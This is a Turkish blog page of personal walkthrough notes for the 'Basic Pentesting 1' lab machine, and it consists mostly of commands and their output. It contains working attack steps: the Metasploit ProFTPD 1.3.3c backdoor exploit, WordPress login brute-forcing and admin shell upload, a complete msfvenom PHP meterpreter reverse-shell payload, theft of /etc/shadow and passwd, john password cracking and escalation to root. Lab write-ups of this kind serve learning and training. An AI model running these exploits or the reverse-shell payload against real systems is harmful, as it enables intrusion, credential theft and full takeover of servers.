99 101 121 104 117 110 32 58 47
Kendim için aldığım notlar belki sizler için de yararlı olur. TWVyYWsgYmlsZ2l5ZSBna WRlbiB5b2xkYSBlbiDDtm5 lbWxpIGFkxLFtZMSxci4=
Home Genel Basic Pentesting 1 Walktgrough

Basic Pentesting 1 Walktgrough

[email protected]:~# nmap -sV -A -v 192.168.1.25

Nmap scan report for 192.168.1.25

Host is up (0.00071s latency).

Not shown: 997 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp ProFTPD 1.3.3c

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)

| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)

|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Site doesn’t have a title (text/html).

MAC Address: 08:00:27:9E:1F:89 (Oracle VirtualBox virtual NIC)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 – 4.9

Uptime guess: 12.168 days (since Thu Oct 17 09:49:47 2019)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=258 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE

HOP RTT ADDRESS

  1. 0.71 ms 192.168.1.25

Proftpd için exploit Araması

msf5 > search proftpd

Matching Modules

================

# Name Disclosure Date Rank Check Description

– —- ————— —- —– ———–

0 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)

1 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 – 1.3.0 sreplace Buffer Overflow (Linux)

2 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (Linux)

3 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow

4 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution

5 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution

msf5 > use exploit/unix/ftp/proftpd_133c_backdoor

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

Name Current Setting Required Description

—- ————— ——– ———–

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

RPORT 21 yes The target port (TCP)

Exploit target:

Id Name

— —-

0 Automatic

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.1.25

rhosts => 192.168.1.25

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[email protected]:~/basic1# unshadow passwd shadow > merged

[email protected]:~/basic1# john merged

Using default input encoding: UTF-8

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])

Cost 1 (iteration count) is 5000 for all loaded hashes

Will run 2 OpenMP threads

Proceeding with single, rules:Single

Press ‘q’ or Ctrl-C to abort, almost any other key for status

Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.

marlinspike (marlinspike)

1g 0:00:00:00 DONE 1/3 (2019-10-29 15:39) 14.28g/s 71.42p/s 71.42c/s 71.42C/s marlinspike..marli

Use the “–show” option to display all of the cracked passwords reliably

Session completed

WordPress Vulnerability







msf5 > use auxiliary/scanner/http/wordpress_login_enum

msf5 auxiliary(scanner/http/wordpress_login_enum) > set username admin

username => admin

msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt

pass_file => /usr/share/wordlists/dirb/common.txt

msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /secret/

targeturi => /secret/

msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.1.30

rhosts1 => 192.168.1.30

msf5 auxiliary(scanner/http/wordpress_login_enum) >exploit


[email protected]:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.26 lport=6565 -f raw

[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload

[-] No arch selected, selecting arch: php from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 1113 bytes

/*<?php /**/ error_reporting(0); $ip = ‘192.168.1.26’; $port = 6565; if (($f = ‘stream_socket_client’) && is_callable($f)) { $s = $f(“tcp://{$ip}:{$port}”); $s_type = ‘stream’; } if (!$s && ($f = ‘fsockopen’) && is_callable($f)) { $s = $f($ip, $port); $s_type = ‘stream’; } if (!$s && ($f = ‘socket_create’) && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = ‘socket’; } if (!$s_type) { die(‘no socket funcs’); } if (!$s) { die(‘no socket’); } switch ($s_type) { case ‘stream’: $len = fread($s, 4); break; case ‘socket’: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(“Nlen”, $len); $len = $a[‘len’]; $b = ”; while (strlen($b) < $len) { switch ($s_type) { case ‘stream’: $b .= fread($s, $len-strlen($b)); break; case ‘socket’: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[‘msgsock’] = $s; $GLOBALS[‘msgsock_type’] = $s_type; if (extension_loaded(‘suhosin’) && ini_get(‘suhosin.executor.disable_eval’)) { $suhosin_bypass=create_function(”, $b); $suhosin_bypass(); } else { eval($b); } die();

msf5 auxiliary(scanner/http/wordpress_login_enum) > use multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.26

lhost => 192.168.1.26

msf5 exploit(multi/handler) > set lport 6565

lport => 6565

msf5 exploit(multi/handler) > run

meterpreter > download /etc/shadow

[*] Downloading: /etc/shadow -> shadow

[*] Downloaded 1.27 KiB of 1.27 KiB (100.0%): /etc/shadow -> shadow

[*] download : /etc/shadow -> shadow

meterpreter > download /etc/passwd

[*] Downloading: /etc/passwd -> passwd

[*] Downloaded 2.31 KiB of 2.31 KiB (100.0%): /etc/passwd -> passwd

[*] download : /etc/passwd -> passwd

meterpreter >

[email protected]:~# unshadow passwd shadow > merged

[email protected]:~# john merged

Using default input encoding: UTF-8

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])

No password hashes left to crack (see FAQ)

[email protected]:~# cd ~/.john

[email protected]:~/.john# rm john.pot

[email protected]:~/.john# cd –

/root

[email protected]:~# john merged

Using default input encoding: UTF-8

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])

Cost 1 (iteration count) is 5000 for all loaded hashes

Will run 2 OpenMP threads

Proceeding with single, rules:Single

Press ‘q’ or Ctrl-C to abort, almost any other key for status

Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.

marlinspike (marlinspike)

1g 0:00:00:00 DONE 1/3 (2019-10-30 16:13) 2.040g/s 10.20p/s 10.20c/s 10.20C/s marlinspike..marli

Use the “–show” option to display all of the cracked passwords reliably

Session completed

[email protected]:~#

python -c ‘import pty; pty.spawn(“/bin/sh”)’ (http://netsec.ws/?p=337)

Bir Başka Yöntem


msf5 exploit(multi/handler) > use exploit/unix/webapp/wp_admin_shell_upload

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password admin

password => admin

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin

username => admin

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret

targeturi => /secret

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.1.30

RHOSTS => 192.168.1.30

msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

meterpreter > shell

Process 558 created.

Channel 1 created.

sh: 0: getcwd() failed: No such file or directory

sh: 0: getcwd() failed: No such file or directory

python -c ‘import pty; pty.spawn(“/bin/sh”)’

sh: 0: getcwd() failed: No such file or directory

$ su – marlinspike

su – marlinspike

Password: marlinspike

[email protected]:~$ sudo bash

sudo bash

[sudo] password for marlinspike: marlinspike

[email protected]:~# whoami

whoami

root

SSH Walkthrough

[email protected]:~# ssh [email protected]

The authenticity of host ‘192.168.1.25 (192.168.1.25)’ can’t be established.

ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added ‘192.168.1.25’ (ECDSA) to the list of known hosts.

[email protected]’s password:

Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

593 packages can be updated.

420 updates are security updates.

New release ‘18.04.3 LTS’ available.

Run ‘do-release-upgrade’ to upgrade to it.

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

[email protected]:~$

You may also like

Leave a Comment

* By using this form you agree with the storage and handling of your data by this website.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy